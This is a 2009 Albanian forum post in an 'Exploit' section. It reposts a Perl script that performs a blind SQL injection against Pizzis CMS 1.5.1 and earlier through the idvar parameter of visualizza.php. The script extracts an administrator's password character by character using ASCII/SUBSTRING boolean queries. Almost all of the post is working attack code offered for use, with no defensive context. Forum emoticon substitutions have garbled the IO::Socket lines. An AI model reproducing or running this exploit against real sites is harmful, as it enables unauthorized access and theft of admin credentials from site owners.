Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
KZ-RadioForumGalleryKërkoLatest imagesRegjistrohuidentifikimi

 :: Forumet Kryesore :: Birucat / Exploit
 

 Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit

Shko poshtë 
AutoriMesazh
loti the hacker
AnTaR-(50%)
loti the hacker


Numri i postimeve : 208
Age : 28
Registration date : 19/12/2008

Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit Empty
MesazhTitulli: Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit   Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit Icon_minitimeSat Jan 24, 2009 11:57 pm
#!/usr/bin/perl

use strict;
use warnings;
use IO:Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit Mozilla_footinmouthocket;

sub usage {
die
"\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
"\n[+] Author: darkjoker".
"\n[+] Site : http://darkjoker.net23.net".
"\n[+] Usage : perl $0 ".
"\n[+] Ex. : perl $0 localhost /pizziscms admin".
"\n[+] Greetz: my girlfriend, she has no idea about what is it <3".
"\n\n";
}

sub query {
my ($user, $chr, $pos) = @_;
my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user = '${user}'),${pos},1))=${chr}";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}

sub exploit {
my ($hostname, $path, $user, $chr, $pos) = @_;
$chr = ord ($chr);

my $sock = new IO:Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit Mozilla_footinmouthocket::INET (
PeerHost => $hostname,
PeerPort => 80,
Proto => "tcp",
) or die $!;

my $query = query ($user, $chr, $pos);
my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n".
"Host: ${hostname}\r\n".
"Connection: Close\r\n\r\n";

print $sock $request;

my $reply;
while (<$sock>)
{
$reply .= $_;

}
close ($sock);

$reply =~ s/\s/ /g;

$reply =~ /

(.+)\/h4>/;
if (length ($1) > 1)
{
return 1;
}
else
{
return 0;
}
}

if (scalar (@ARGV) != 3)
{
usage ();
}

my ($hostname, $path, $user) = @ARGV;

my @key = split ('', 'abcdefghijklmnopqrstuvwxyz0123456789');
my $pos = 1;
my $chr = 0;

print "[+] Password: ";
while ($pos <= 32)
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
print $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

print "\n";

Mbrapsht në krye Shko poshtë
https://poroj.albanianforum.net
 
Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» VUPlayer <= 2.49 .PLS Universal Buffer Overflow Exploit
» PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Forumet Kryesore :: Birucat / Exploit -
Kërce tek: